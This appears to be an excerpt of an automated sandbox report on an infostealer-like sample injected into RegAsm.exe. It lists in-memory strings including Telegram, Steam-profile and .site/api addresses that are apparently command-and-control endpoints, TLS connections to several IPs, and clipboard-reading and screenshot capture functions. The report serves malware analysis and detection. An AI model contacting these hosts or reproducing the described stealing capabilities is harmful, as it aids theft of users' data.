Source: RegAsm.exe, 00000003.00000002.2602299616.0000000019E6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/N
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGDGCGCFHI.exe, 0000000B.00000002.2560292223.000000000440B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/i
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2861588723.000000000048F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2863943868.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.000000000048F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlg
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlgT9
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGDGCGCFHI.exe, 0000000B.00000002.2560292223.000000000440B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlgfjnsdajbgfq12gdhttps://steamcommunity.com/profiles/76561199780418869u55uhttps:/
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlgu
Source: RegAsm.exe, 0000000A.00000002.2584297027.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://underlinemdsj.site/api
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://underlinemdsj.site/icatl
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000481000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writekdmsnu.site/api
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writekdmsnu.site/apim1L
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000003.00000002.2602299616.0000000019E6C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/.exe
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/XtskAOKlzbDcHFgqacPdLggz.exe
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/e:
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: RegAsm.exe, 00000003.00000002.2602299616.0000000019E6C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/ows:
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.129:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.129:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49741 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00439D70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

10_2_00439D70

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00439D70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

10_2_00439D70

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411F55

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 394240
Source: KECBKKEBKE.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 360448
Source: 66fa2b049020f_ldnf[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 360448
Source: EGDGCGCFHI.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 394240
Source: 66fa2afc5abea_vasd[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 394240
Source: DBGIJEHIID.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 314368

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	3_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C57B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57B8C0 rand_s,NtQueryVirtualMemory,	3_2_6C57B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6C57B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C51F280

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C5BC	3_2_0041C5BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B85C	3_2_0041B85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DA83	3_2_0042DA83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D313	3_2_0042D313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00419654	3_2_00419654
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DE6B	3_2_0042DE6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CE7E	3_2_0042CE7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D6B1	3_2_0042D6B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5135A0	3_2_6C5135A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58545C	3_2_6C58545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C525440	3_2_6C525440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C555C10	3_2_6C555C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C562C10	3_2_6C562C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58AC00	3_2_6C58AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58542B	3_2_6C58542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53D4D0	3_2_6C53D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5264C0	3_2_6C5264C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C556CF0	3_2_6C556CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51D4E0	3_2_6C51D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C526C80	3_2_6C526C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5734A0	3_2_6C5734A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57C4A0	3_2_6C57C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53ED10	3_2_6C53ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C540512	3_2_6C540512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52FD00	3_2_6C52FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C550DD0	3_2_6C550DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5785F0	3_2_6C5785F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C539E50	3_2_6C539E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C553E50	3_2_6C553E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C534640	3_2_6C534640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C562E4E	3_2_6C562E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51C670	3_2_6C51C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C586E63	3_2_6C586E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C557E10	3_2_6C557E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C565600	3_2_6C565600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C579E30	3_2_6C579E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51BEF0	3_2_6C51BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52FEF0	3_2_6C52FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5876E3	3_2_6C5876E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C535E90	3_2_6C535E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57E680	3_2_6C57E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C574EA0	3_2_6C574EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C557710	3_2_6C557710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C529F00	3_2_6C529F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C546FF0	3_2_6C546FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51DFE0	3_2_6C51DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5677A0	3_2_6C5677A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C538850	3_2_6C538850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53D850	3_2_6C53D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55F070	3_2_6C55F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C527810	3_2_6C527810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55B820	3_2_6C55B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C564820	3_2_6C564820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5850C7	3_2_6C5850C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53C0E0	3_2_6C53C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5558E0	3_2_6C5558E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5460A0	3_2_6C5460A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53A940	3_2_6C53A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C56B970	3_2_6C56B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58B170	3_2_6C58B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52D960	3_2_6C52D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C555190	3_2_6C555190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C572990	3_2_6C572990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54D9B0	3_2_6C54D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51C9A0	3_2_6C51C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C559A60	3_2_6C559A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C558AC0	3_2_6C558AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C531AF0	3_2_6C531AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55E2F0	3_2_6C55E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58BA90	3_2_6C58BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52CAB0	3_2_6C52CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C582AB0	3_2_6C582AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5122A0	3_2_6C5122A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C544AA0	3_2_6C544AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C515340	3_2_6C515340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52C370	3_2_6C52C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55D320	3_2_6C55D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5853C8	3_2_6C5853C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51F380	3_2_6C51F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5CAC60	3_2_6C5CAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C69AC30	3_2_6C69AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C686C00	3_2_6C686C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5BECC0	3_2_6C5BECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C61ECD0	3_2_6C61ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C68ED70	3_2_6C68ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6EAD50	3_2_6C6EAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C748D20	3_2_6C748D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040F242	10_2_0040F242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00410A14	10_2_00410A14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040FEA0	10_2_0040FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00434060	10_2_00434060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401000	10_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B010	10_2_0040B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042F038	10_2_0042F038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00440118	10_2_00440118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00409130	10_2_00409130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00434136	10_2_00434136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0043F1E0	10_2_0043F1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004492C0	10_2_004492C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401297	10_2_00401297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00405320	10_2_00405320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040A3F0	10_2_0040A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004073B0	10_2_004073B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449410	10_2_00449410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B4B0	10_2_0040B4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449580	10_2_00449580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00411600	10_2_00411600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042D6F0	10_2_0042D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449690	10_2_00449690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00448740	10_2_00448740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00408750	10_2_00408750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00403710	10_2_00403710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004407E0	10_2_004407E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449780	10_2_00449780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041E85A	10_2_0041E85A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042887B	10_2_0042887B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00430810	10_2_00430810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00439880	10_2_00439880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040A940	10_2_0040A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041E900	10_2_0041E900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449A40	10_2_00449A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00409AC4	10_2_00409AC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00444B60	10_2_00444B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042DB00	10_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00439B00	10_2_00439B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041FB39	10_2_0041FB39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042DBD5	10_2_0042DBD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00448C40	10_2_00448C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00428D00	10_2_00428D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00428D1C	10_2_00428D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0044AD20	10_2_0044AD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00429DC9	10_2_00429DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00407DB0	10_2_00407DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00437E70	10_2_00437E70
